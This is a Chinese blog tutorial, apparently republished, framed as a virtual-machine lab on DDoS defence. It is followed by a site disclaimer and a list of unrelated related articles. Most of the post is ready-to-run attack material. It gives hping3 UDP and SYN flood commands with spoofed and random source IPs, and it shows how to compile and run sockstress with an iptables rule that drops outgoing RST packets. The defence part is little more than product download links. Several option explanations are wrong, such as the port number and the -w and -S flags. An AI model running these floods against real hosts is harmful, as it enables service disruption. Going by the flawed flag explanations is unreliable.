41-4 DDOS攻击防护实战

一、UDP FLOOD攻击

# hping3 -q -n -a <攻击IP> -S -s <源端口> --keep -p <目的端口> --flood <被攻击IP>
hping3 --udp -s 6666 -p 53 -a 192.168.1.6 --flood 192.168.1.13

这个命令是使用hping3工具进行UDP Flood攻击的命令。下面是各个选项的作用:

  • -q: 静默模式,不显示任何输出。
  • -n: 不解析主机名,直接使用IP地址。
  • -a <攻击IP>: 设置源IP地址,即攻击者的IP地址。
  • -S: 使用SYN标志位进行TCP连接。
  • -s <源端口>: 设置源端口号,即攻击者的端口号。
  • --keep: 在攻击过程中保持连接。
  • -p <目的端口>: 设置目标端口号,即被攻击者的端口号。
  • --flood <被攻击IP>: 发送大量的数据包进行洪水式攻击。

演示:

hping3工具kali上有,所以要开启kali虚拟机作为攻击机,然后在开一台windows系统虚拟机作为被攻击机(windows系统查看cpu比较方便,没有windows系统虚拟机的开linux也可以)

1)查看虚拟机ip
# windows
ipconfig# linux
ifconfig

2)然后确保两台虚拟机之间可以ping通
# windows
ping 目标ip# linux(-c 4 意思是只发送4个测试包,不指定linux系统是会不断的发送)
ping -c 4 目标ip

3)使用kail对windows系统发动 UDP FLOOD 攻击

注意:命令中的ip要改成自己的

# 192.168.1.45 是 windows 的ip,53 也是windows系统默认开放的端口
hping3 --udp -s 6666 -p 53 -a 192.168.1.3 --flood 192.168.1.45# 或者
hping3 -c 100000 -d 65038 -S -w 64 -p 53 --flood --rand-source 192.168.1.45-c 100000:表示发送100000个TCP SYN数据包,即向目标主机发送大量连接请求。
-d 65038:指定TCP数据包的数据负载为65038字节。这里使用了最大值,以增加攻击流量的大小。
-S:设置TCP SYN标志位,表示向目标主机发起连接请求。
-w 64:指定TCP窗口大小为64,即每发一个数据包之后要等待64个ACK确认信号再继续发送数据包。这样可以使攻击流量更加真实,模拟正常的TCP连接。
-p 21:指定目标端口号为21,即攻击目标的FTP服务端口号。
--flood:表示进行洪水攻击,即不断发送大量的攻击流量。
--rand-source:表示随机选择源IP地址,并且在每次发送数据包时都更换一次源IP地址。
192.168.1.45:指定目标IP地址为192.168.1.45,即攻击的目标。

 这里很奇怪,我攻击虚拟机没反应但是我攻击真实机就可以

如果你没安装抓包工具,也可以使用命令行查看

netstat -ano

该命令将显示系统上当前活动的网络连接和监听的端口号。列出的结果中,Local Address一列显示的是本地IP地址和端口号。 

 

二、sockstress 攻击

sOCKSTRESS是一种DDoS攻击工具,它利用TCP连接中的漏洞来占用目标系统的资源,使其无法正常响应请求。以下是使用sOCKSTRESS进行攻击的步骤:

1)下载sockstress脚本:GitHub - defuse/sockstress: Sockstress (TCP DoS) implementation.

2)设置防火墙规则,过滤发送给server的REST包,防止server断开连接。
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被攻击主机IP -j DROP
iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 192.168.1.45 -j DROP

kali攻击机中设置

3)编译sockstress.c文件
# 进入到工具文件中
cd sockstressgcc -Wall -c sockstress.c
gcc -pthread -o sockstress sockstress.o

4)运行sockstress脚本,指定目标系统的IP地址和网络接口名称。
./sockstress 192.168.1.45:80 eth0

5)可以选择使用-p选项指定负载类型,比如使用http负载。
./sockstress 192.168.1.45:80 eth0 -p payloads/http

防御

1、冰盾:冰盾DDoS防火墙 - 18年专注DDoS防护 防CC攻击 防SYN攻击 防流量攻击 拒绝服务 DDoS防护 冰盾 免费防火墙 (bingdun.com)

 安装没啥好说的一路下一步就好,最后重启系统就能使用了,不过试用版全功能防护2小时,仅适用于32位的Win2003操作系统,因为我之前攻击Win2003虚拟机也没有成功所以这里没法做攻击演示他的防护,不过这种正版软件防护能力肯定是没问题的,不然他们也没法赚钱。

2)安全狗(推荐,因为这个是免费的,当然企业版也是收费的)

网页安全狗下载:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改 (safedog.cn)

服务器安全狗:链接:https://pan.baidu.com/s/1LsT0AwVP5DKO7-WJ3zHo0Q?pwd=jwx3 
提取码:jwx3

安装 

安装完成后他会自动对你的apache展开防护

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/14105.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

three.js能实现啥效果?看过来,这里都是它的菜(06)

这是第五期了&#xff0c;本期继续分享three.js可以实现的3D动画案例&#xff0c;有老铁反馈再发案例的时候&#xff0c;是否可以顺道分享一下three.js的知识点&#xff0c;好吧&#xff0c;安排。 材质动画 材质动画可以实现各种复杂的视觉效果&#xff0c;包括但不限于以下…

【css】引入背景图时候,路径写入@会报错

看报错信息 我的写法 解决办法 在前面加个~

js解决数字小数计算出现的精度丢失问题(2024-05-24)

精度丢失的原因 js小数进行数值运算时出现精度丢失问题 JavaScript 的number类型在进行运算时都先将十进制转二进制&#xff0c;此时&#xff0c;小数点后面的数字转二进制时会出现无限循环的问题。 为了避免这一个情况&#xff0c;要舍0进1&#xff0c;此时就会导致精度丢失…

企业宽带跑pcdn会被查吗?

企业宽带使用PCDN技术&#xff0c;本身并不违反相关规定&#xff0c;因此一般不会被查。PCDN是一种内容分发网络技术&#xff0c;通过将内容缓存在离用户更近的服务器上&#xff0c;减少数据传输的延迟&#xff0c;提高访问速度。这种技术可以提高网页加载速度和视频播放流畅度…

Excel未响应时强关后,Excel插件消失

目录 我们分析一下插件消失的原因&#xff1a; 针对上面表现出来的2个问题&#xff0c;进行针对性的解决 &#xff1a; 1、不被关进去&#xff0c;是不是就没有后续的一系列的问题了&#xff0c;各自安好 2、保留住自动加载的行为 PS&#xff1a;配置受信任的位置注册列表…

2024电工杯B题保姆级分析完整思路+代码+数据教学

2024电工杯B题保姆级分析完整思路代码数据教学 B题题目&#xff1a;大学生平衡膳食食谱的优化设计及评价 接下来我们将按照题目总体分析-背景分析-各小问分析的形式来 总体分析&#xff1a; 题目要求对两份一日膳食食谱进行营养分析和调整&#xff0c;然后设计优化的平衡膳…

生成模型 | 从 VAE 到 Diffusion Model (上)

文章目录 一&#xff0c;GAN(对抗式生成网络&#xff09;二&#xff0c;Auto-Encoder(AE) 和 Denoising Auto-Encoder (DAE)三&#xff0c;VAE四&#xff0c;VQ-VAE (Vector Quantized Variational Autoencoder)VQ-VAE 2小总结&#xff1a; 五&#xff0c;DALL-E &#xff08;O…

硅谷裸机云服务器性能测评哪些内容

硅谷裸机云服务器&#xff0c;作为云计算领域的一股新兴力量&#xff0c;近年来受到了广泛关注。其强大的性能和灵活性为用户提供了更高效、更稳定的云计算服务。那么&#xff0c;硅谷裸机云服务器的性能测评究竟包括哪些内容呢?接下来&#xff0c;我们就来科普一下。 首先&am…

如何让大模型更聪明?

如何让大模型更聪明&#xff1f; *随着人工智能技术的飞速发展&#xff0c;大模型在多个领域展现出了前所未有的能力&#xff0c;但它们仍然面临着理解力、泛化能力和适应性等方面的挑战。那么&#xff0c;如何让大模型变得更聪明呢&#xff1f; 方向一&#xff1a;算法创新 …

留学培训行业PaaS应用系统架构的设计与实践

随着留学需求的增长和教育培训市场的不断扩大&#xff0c;留学培训行业正面临着越来越多的挑战和机遇。在这个背景下&#xff0c;利用PaaS&#xff08;Platform as a Service&#xff09;平台来构建留学培训行业的应用系统架构&#xff0c;将成为提升服务质量和效率的重要手段。…

Nacos 2.x 系列【8】集成 Spring Cloud Gateway

文章目录 1. 概述1.1 API 网关1.1 Spring Cloud Gateway 2. 集成案例2.1 入门案例2.2 动态路由 1. 概述 1.1 API 网关 API网关已经成为了微服务架构的一个标配组件&#xff0c;是系统对外的唯一入口。所有的客户端都通过统一的网关接入微服务&#xff0c;在网关层处理所有非业…

部署 harbor 创建私有项目

一在 Docker harbor 节点&#xff08;192.168.11.&#xff09;上操作 1 关闭防火墙防护 systemctl stop firewalld.service systemctl disable firewalld.service setenforce 0 2 安装docker yum install -y yum-utils device-mapper-persistent-data lvm2 yum-config-ma…

SSRF攻击技术

1、SSRF形成原因 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下&#xff0c;SSRF是要目标网站的内部系统。&#xff08;因为他是从内部系统访问的&#xff0c;所有可以通过它攻击外网无法访问的内部系…

思科模拟器--03.RIP协议路由--24.5.17

1.首先&#xff0c;先创建两个个人电脑:PC0和PC1和三个路由器:R1&#xff0c;R2和R3. (诀窍:建议用文本框标注一下重要简短的内容; 目的:降低失误概率,提高成功率!) 第0步:(个人电脑的IP,子网掩码和默认网关配置) 接着&#xff0c;可以先将个人电脑的IP和网关先配置一下…

ThreadLocal原理及使用

一、引言 在Java多线程编程中&#xff0c;ThreadLocal是一个非常有用的工具&#xff0c;它提供了一种将对象与线程关联起来的机制&#xff0c;使得每个线程都可以拥有自己独立的对象副本&#xff0c;从而避免了线程安全问题。然而&#xff0c;使用不当会导致内存泄漏问题。 二…

go 微服务框架kratos错误处理的使用方法及原理探究

通过go语言原生http中响应错误的实现方法&#xff0c;逐步了解和使用微服务框架 kratos 的错误处理方式&#xff0c;以及探究其实现原理。 一、go原生http响应错误信息的处理方法 处理方法&#xff1a; ①定义返回错误信息的结构体 ErrorResponse // 定义http返回错误信息的…

无人机飞手前途分析

无人机飞手的前途充满了各种可能性和挑战&#xff0c;这主要得益于无人机技术的快速发展和广泛应用。以下是对无人机飞手前途的一些分析&#xff1a; 1. 技术发展与需求增长&#xff1a;随着无人机技术的不断进步&#xff0c;其应用场景也在持续扩大。从地理测绘、巡检、农林植…

利用阿里OSS服务给文件设置过期删除--简单版

在云存储广泛应用的今天&#xff0c;阿里云的Object Storage Service&#xff08;OSS&#xff09;以其高度可扩展性、安全性和成本效益&#xff0c;成为了众多企业和开发者存储海量数据的首选方案。随着数据量的不断膨胀&#xff0c;高效的数据管理和成本控制变得尤为重要。其中…

IT学习笔记--Kafka

Kafka概述: 定义: Kafka是一个分布式的基于发布/订阅模式的消息队列&#xff0c;主要应用于大数据实时处理领域。 消息队列消息队列的两种模式: 点对点模式: 消息生产者生产消息发送到Queue中&#xff0c;然后消息消费者从Queue中取出并且消费消息。 消息被消费以后&#…

Linux中解决普通用户使用不了sudo问题

目录 sudo的使用场景sudo使用不了的原因解决方法 sudo的使用场景 之前我们介绍了文件的权限问题 如果一个普通用户想去执行一个它命令之外的权限&#xff0c;只能使用sudo 比如普通用户使用yum去安装软件&#xff0c;需要sudo yum xxxx sudo使用不了的原因 这里我们用普通用户…